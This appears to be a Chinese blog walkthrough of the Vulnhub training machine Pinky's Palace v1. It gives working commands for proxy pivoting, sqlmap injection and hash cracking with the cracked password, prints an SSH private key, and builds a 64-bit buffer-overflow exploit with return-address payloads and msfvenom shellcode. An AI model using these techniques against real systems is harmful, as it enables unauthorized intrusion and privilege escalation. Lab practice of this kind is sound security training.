[Vulnhub] Pinkys-PalaceV1 Squid http proxy+SQI+BOF

最新推荐文章于 2024-09-14 17:19:37 发布
最新推荐文章于 2024-09-14 17:19:37 发布
阅读量473 收藏 4
点赞数 9
分类专栏: PWN Vulnhub 文章标签: http 网络协议 网络
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140358871
版权
Vulnhub 同时被 2 个专栏收录
31 篇文章 0 订阅
订阅专栏
PWN
12 篇文章 0 订阅
订阅专栏

信息收集

IP AddressOpening Ports
192.168.8.106TCP:8080,31337,64666

$ nmap -p- 192.168.8.106 --min-rate 1000 -sC -sV

PORT      STATE SERVICE    VERSION
8080/tcp  open  http       nginx 1.10.3
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.10.3
31337/tcp open  http-proxy Squid http proxy 3.5.23
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.23
64666/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 df:02:12:4f:4c:6d:50:27:6a:84:e9:0e:5b:65:bf:a0 (RSA)
|   256 0a:ad:aa:c7:16:f7:15:07:f0:a8:50:23:17:f3:1c:2e (ECDSA)
|_  256 4a:2d:e5:d8:ee:69:61:55:bb:db:af:29:4e:54:52:2f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

image.png

$ curl http://127.0.0.1:8080 -x 192.168.8.106:31337

image-1.png

目录爆破

image-2.png

$ dirb http://127.0.0.1:8080 /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -p 192.168.8.106:31337

$ gobuster dir -u "http://127.0.0.1:8080/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt --proxy http://192.168.8.106:31337

http://127.0.0.1:8080/littlesecrets-main/

image-3.png

image-5.png

image-6.png

SQLI

$ sqlmap --proxy=http://192.168.8.106:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php --level=5 --risk=3 --dump users

image-7.png

+-----+----------------------------------+-------------+
| uid | pass                             | user        |
+-----+----------------------------------+-------------+
| 1   | f543dbfeaf238729831a321c7a68bee4 | pinky       |
| 2   | d60dffed7cc0d87e1f4a11aa06ca73af | pinkymanage |
+-----+----------------------------------+-------------+

$ hashcat -m 0 -a 0 'd60dffed7cc0d87e1f4a11aa06ca73af' /usr/share/wordlists/rockyou.txt --force

image-8.png

username:pinkymanage
password:3pinkysaf33pinkysaf3

SSH

$ ssh pinkymanage@192.168.8.106 -p 64666

image-9.png

pinkymanage@pinkys-palace:~$ cat /var/www/html/littlesecrets-main/ultrasecretadminf1l35/note.txt

image-10.png

pinkymanage@pinkys-palace:~$ cat /var/www/html/littlesecrets-main/ultrasecretadminf1l35/.ultrasecret|base64 -d

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA16fxL3/+h/ILTZewkvekhIQ1yk0oLI+y3N4AItkhez11Iha8
Hc7KOx/L9g2jd3H8dGPUfKKr9seqtg97ZKA95S/sb4w3Qtl1ABu/pVKZBbGGsHG/
yIvGEPKS+BSZ4stMW7Hnx7ciMuhwcZwLqZmsySumECTueQswNPblITlrqolpYF8x
e47El9pHwewNWcIrmqraxCH5TC7UhjgGaQwmW3qHyrSqp/jK/ctb1ZpnPv+DC833
u/Tyjm6z8RaDZG/gRBIrMGnNbg4pZFhtgbGVOf7feGvBFR8BiT+7VFfO7yEvyBx9
gxrySxu2Z0aOM8QR6MGaDMjYUnB9aTYuw8GP4wIDAQABAoIBAA6iH7SIa94Pp4Kx
W1LtqOUxD3FVwPcdHRbtnXa/4wy4w9z3S/Z91K0kYDOnA0OUoXvIVl/Krf6F1+iY
rlfKo8iMcu+yxQEtPkoul9eA/k8rl6cbYNcb3OnDfAOHalXAU8MZFFAx9gkcSpz6
6LOucNIJuy/3QZNHFhNR+YRCoDKnFnEILxYL5Wz2qptWMYDuwtmGzO968YbLrOV1
okWN6gMiEi5qprBh5a8wBRQVaBrLYWg8WeXfWfkGzKoxKPFKzhI5j4/EkxLDJqt3
LA7JRxmFn77/mbvaDW8WZX0fOcS8ugyRBEN0VpdnF6kl6tfOXKGj0gd+gAiw0TVR
2CB7PsECgYEA8IW3ZsKtbCkRBtF+VTBq4K46s7ShW9AZ6+bpb+d1NRT5xRJG+Dsz
F3cg4N+39nYg8mFwsBhn/szgVBNWZouWrRNrDExH0yu6HOJ7zLWQayUhQJiIPxpc
n/Eed6SrcySfzgmntOib4hyGjF0/wntjMc73xuAVNuO8A6WW+hgVHKECgYEA5YiW
K2vbVNBqEBCP+xrC5dHOBIEWv89BFIm/Fs/esh8uE5Lnj11eP+1EZh2FK92Qx9Yv
y1bMsAkf+ptFUJLck1M20efAaSvOhr5uajnyqCofsSUfKZaa7nPQozepqMKXGMoy
MEEeLOw56sJhSp0UdXyaz9FQAmvzSXUnuo1t+gMCgYEAubx42WkCpSC9XkeOyFhg
YGsLN9UIOi9kpRAnOlxB3aD6FF494dlNZhR/lkgM9s1YOfRXIhVm0ZQCs8pPEVdA
Hx18r/2EBaWhzkZzlayr/qGooQppRFmmJ3j6ryfBomQo5+H62TA7mIuwt1oXL6c6
/a63FqPang2VFjfcc/r+6qECgYA+AzrfHFKzhWNCV9cudjp1sMtCOEYXKD1i+Rwh
Y6O85+Og8i2RdB5EkyvJkuwpv8Cf3OQowZinbq+vG0gMzsC9JNxItZ4sS+OOT+Cw
3lsKx+asC2Vx7PiKt8uEbUNvDrOXxPjuRImMhX3YSQ/UAsBGRZXl050UKmoeTIKh
ShiOVQKBgQDsS41imCxW2me541vtwAaIpQ5lo5OVzD2A9teEPsU6F2h6X7pWR6IX
A9rpLWmbfxGgJ0MVhxCjpeYgSC8UsdMzNa2ApcwOWQekNE4eLtO7Zv2SVDr6cIrc
HccEP+MGM2eUfBPnkaPkbCPr7tnqPf8eJqiQUkWVh2CnYzeAHr5OmA==
-----END RSA PRIVATE KEY-----

``

$ ssh -i ./id_rsa pinky@192.168.8.106 -p 64666

image-11.png

image-12.png

权限提升&BOF

image-22.png

image-13.png

image-14.png

方法 1

$ gdb -q ./adminhelper

(gdb) break main

(gdb) run 1

(gdb) jump spawn

image-15.png

(gdb) info functions spawn

image-16.png

(gdb) run $(python -c "print 'A'*72")

通过测试缓冲区溢出为72

image-17.png

(gdb) run $(python -c "print 'A'*72+'B'*4")

image-18.png

(gdb) run $(python -c "print 'A'*72+'\xd0\x47\x55\x55\x55\x55\x00\x00'")

image-19.png

$ ./adminhelper $(python -c "print 'A'*72+'\xd0\x47\x55\x55\x55\x55\x00\x00'")

image-20.png

image-21.png

99975cfc5e2eb4c199d38d4a2b2c03ce

方法 2

$ msfvenom -a x64 -p linux/x64/exec CMD=/bin/sh -b '\x00\x0b\x0d\x0a\x18\x0c\x23\x24\x28\x29' | hexdump -v -e '"\\\x" 1/1 "%02x"'

image-23.png

$ export maptnh=`python -c 'print "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\xa1\x12\x80\xb5\xc8\x09\xbf\x96\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xe9\xaa\xaf\xd7\xa1\x67\x90\xe5\xc9\x12\x19\xe5\x9c\x56\xed\xf0\xc9\x3f\xe3\xe1\x96\x5b\x57\x9e\xa1\x12\x80\x9a\xaa\x60\xd1\xb9\xd2\x7a\x80\xe3\x9f\x5d\xe1\xfc\x9a\x4a\x8f\xb0\xc8\x09\xbf\x96"'` 

/*getenv.c*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}

$ gcc -o getenv getenv.c

$ ./getenv maptnh ~/adminhelper

image-25.png

$ ~/adminhelper $(python -c "print 'A'*72+'\xaf\xee\xff\xff\xff\x7f'")

image-26.png

Мартин.
关注
专栏目录
[Vulnhub] Pinkys-Palace2 Ports-Knocking+ssh_crack+LFI+RE+Corn+RE&BOF
07-13 314
#Ports-Knocking #ssh2john #LFI #Reverse #横向 #Reverse&BOF缓冲区溢出
OSCP练习:vulhub靶机pinkys-palace-v1
weixin_47311099的博客
10-26 1305
在/var/www/html/littlesecrets-main/ultrasecretadminf1l35 发现rsa密钥.ultrasecret。账密为pinkymanage/3pinkysaf33pinkysaf3,ssh登录。发现8080,但是403,31337端口是http代理 ,64666为ssh。直接访问403,配置代理,访问127.0.0.1:8080。执行后没有反应,加上一点参数发现会进行输出,但执行不了命令。这个长得就像个sql注入…尝试缓冲区溢出,输入废字符, 得到边界值为72。
【甄选靶场】Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)
人间体佐菲的博客
09-30 929
【甄选靶场】Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)网络安全,渗透测试
2、靶机——Pinkys-Place v3(2)
qq_55202378的博客
09-22 434
靶机 formatworld
1、靶机——Pinkys-Place v3(1)
qq_55202378的博客
09-20 734
Pinkys-Place
No.27-VulnHub-Pinky's Palace: v2-Walkthrough渗透学习
qq_34801745的博客
01-23 2117
** VulnHub-Pinky’s Palace: v2-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pinkys-palace-v2,229/ 靶机难度:中级(CTF) 靶机发布日期:2018年3月18日 靶机描述:一个现实的Boot2Root。获得对系统的访问权限并阅读/root/root.txt 进入难度:容易/中级 扎根困难:中级/...
红队打靶练习:PINKY‘S PALACE: V1
分享
12-15 683
红队打靶练习:PINKY'S PALACE: V1,犹如毒蝎猛刺般的绝望感.....
【甄选靶场】Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod提权)
人间体佐菲的博客
10-10 1341
【甄选靶场】Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod提权)
No.26-VulnHub-Pinky's Palace: v1-Walkthrough渗透学习
qq_34801745的博客
01-22 2261
** VulnHub-pWnOS: 1.0-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pwnos-10,33/ 靶机难度:初级(CTF) 靶机发布日期:2008年6月27日 靶机描述:你们中有些人可能已经注意到了这个新的pWnOS论坛部分。我创建了pWnOS作为虚拟机,Grendel很好,可以在这里发布它。这是有关pWnOS的一些信息。 这...
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3158
每台都做一做,然后记录在博客里.供自己和大家一起学习.
小白的靶机VulnHub-Pinky‘s Palace: v3
热门推荐
wo41ge的博客
02-19 1万+
靶机地址:https://www.vulnhub.com/entry/pinkys-palace-v3,237/ 开机界面 就是这样 确定了靶机的IP地址:192.168.106.150 靶机开放了21、5555、8000端口 一个一个来 21端口 ftp服务可以匿名访问 5555端口有ssh服务 8000端口有http服务 运行了Drupal 打开康康 让我们尽量不要使用metasploit工具 kali上ftp匿名登录 去底层 康康 匿名登录 就是 账号:ftp 密码:空 这边遇到一个问题
Frida 脚本抓取 HttpURLConnection 请求和响应
PwnGuo的博客
09-11 332
通过 Java.registerClass 创建自定义拦截器 MyInterceptor。拦截器中重写 intercept 方法,处理并打印请求和响应信息。
HTTP 四、HttpClient的使用
kkkkatoq的博客
09-10 584
HttpClient是Apache Jakarta Common下的子项目,用来提供高效的、最新的、功能丰富的支持HTTP协议的客户端编程工具包,并且它支持HTTP协议最新的版本和建议。HttpClient已经应用在很多的项目中,比如Apache Jakarta上很著名的另外两个开源项目Cactus和HTMLUnit都使用了HttpClient。HTTP和浏览器有点像,但却不是浏览器。
通过XMLHttpRequest和window.open在浏览器中打开文件流pdf以及下载pdf
lixu_boke的博客
09-11 588
当然我这里使用的是原生的,如果可以的也可以使用axios、ajax都是可以的,反正都是通过接口获取文件流进而通过blob不同的类型转换用于浏览器的展示;blob的type有很多,还有图片image/png等等。首先通过接口获取文件流数据。浏览器下载文件和预览差不多。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1574
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
安装 `privoxy` 将 Socks5 转换为 HTTP 代理
最新发布
keyboard专栏
09-14 422
Socks5 代理可以通过curl测试正常工作。Docker直接使用 Socks5 代理是不可行的,因此通过privoxy将 Socks5 代理转换为 HTTP 代理,并让 Docker 使用 HTTP 代理是解决方案。
LINUX网络编程:http
W2155的博客
09-13 844
1.认识http请求的字段2.HTTP请求类3.认识HTTP应答字段4.HTTP应答类5.源代码。
HTTP 请求处理的完整流程到Servlet流程图
qq_35915504的博客
09-10 704
Web 容器创建 ServletRequest 和 ServletResponse 对象,然后调用匹配的 Servlet 的 service() 方法。我会为您创建一个详细的流程图,从 TCP 三次握手开始,一直到 Servlet 处理请求并返回响应。它是 Servlet 处理过程的一部分,用于告诉客户端(浏览器)如何解释返回的数据。现在,让我们创建一个详细的流程图,展示从客户端发起请求到服务器处理并返回响应的整个过程。浏览器接收响应,解析内容(根据之前设置的 Content-Type),并显示给用户。
HTTP 协议介绍
2202_75577207的博客
09-09 727
HTTP 是一种应用层协议,是基于 TCP/IP 通信协议来传递数据的,其中 HTTP1.0、HTTP1.1、HTTP2.0 均为 TCP 实现,HTTP3.0 基于 UDP 实现。HTTP(Hyper Text Transfer Protocol): 全称超文本传输协议,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。协议: 为了使数据在网络上从源头到达目的,网络通信的参与方必须遵循相同的规则,这套规则称为协议,它最终体现为在网络上传输的数据包的格式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值